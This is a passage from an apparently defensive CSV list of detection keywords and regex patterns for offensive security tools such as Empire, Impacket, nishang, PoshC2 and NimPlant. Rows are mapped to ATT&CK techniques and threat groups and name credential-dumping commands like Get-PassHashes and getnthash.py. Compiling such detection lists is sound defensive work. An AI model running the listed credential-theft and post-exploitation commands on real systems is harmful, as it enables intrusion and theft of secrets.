Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46154"
"*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*",".{0,1000}Get\-NetUser\s\-UACFilter\sNOT_ACCOUNTDISABLE.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46156"
"*getNimplantByGuid*",".{0,1000}getNimplantByGuid.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","46157"
"*GetNPUsers.py -request*",".{0,1000}GetNPUsers\.py\s\-request.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46158"
"*GetNPUsers.py*",".{0,1000}GetNPUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46159"
"*Get-NTDSdit*",".{0,1000}Get\-NTDSdit.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46160"
"*getnthash.py -key *",".{0,1000}getnthash\.py\s\-key\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","46161"
"*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*",".{0,1000}getnthash\.py\s\-key\s\'8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46162"
"*getnthash.py*",".{0,1000}getnthash\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","46163"
"*Get-NTLM.ps1*",".{0,1000}Get\-NTLM\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46164"
"*GetNTLMChallengeBase64*",".{0,1000}GetNTLMChallengeBase64.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","46165"
"*Get-NTLMLocalPasswordHashes*",".{0,1000}Get\-NTLMLocalPasswordHashes.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46166"
"*getPac.py*",".{0,1000}getPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46167"
"*Get-PacketNetBIOSSessionService*",".{0,1000}Get\-PacketNetBIOSSessionService.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46168"
"*Get-PacketNTLMSSPAuth*",".{0,1000}Get\-PacketNTLMSSPAuth.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46169"
"*Get-PacketNTLMSSPNegotiate*",".{0,1000}Get\-PacketNTLMSSPNegotiate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46170"
"*Get-PacketRPCBind*",".{0,1000}Get\-PacketRPCBind.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46171"
"*Get-PacketRPCRequest*",".{0,1000}Get\-PacketRPCRequest.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46172"
"*Get-PacketSMB*",".{0,1000}Get\-PacketSMB.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46173"
"*Get-PassHashes*",".{0,1000}Get\-PassHashes.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46174"
"*Get-PassHashes.ps1*",".{0,1000}Get\-PassHashes\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46175"
"*Get-PassHashes.ps1*",".{0,1000}Get\-PassHashes\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46176"
"*Get-PassHints*",".{0,1000}Get\-PassHints.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46177"
"*get-passnotexp*",".{0,1000}get\-passnotexp.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46178"
"*get-password-policy.py*",".{0,1000}get\-password\-policy\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","46179"
"*Get-PEBasicInfo*",".{0,1000}Get\-PEBasicInfo.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46180"
"*Get-PEHeader.ps1*",".{0,1000}Get\-PEHeader\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46181"
"*getPositionImplant*",".{0,1000}getPositionImplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","46182"
"*Get-PotentialDLLHijack*",".{0,1000}Get\-PotentialDLLHijack.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","46183"
"*Get-PrivilegedGroupAccounts*",".{0,1000}Get\-PrivilegedGroupAccounts.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46184"
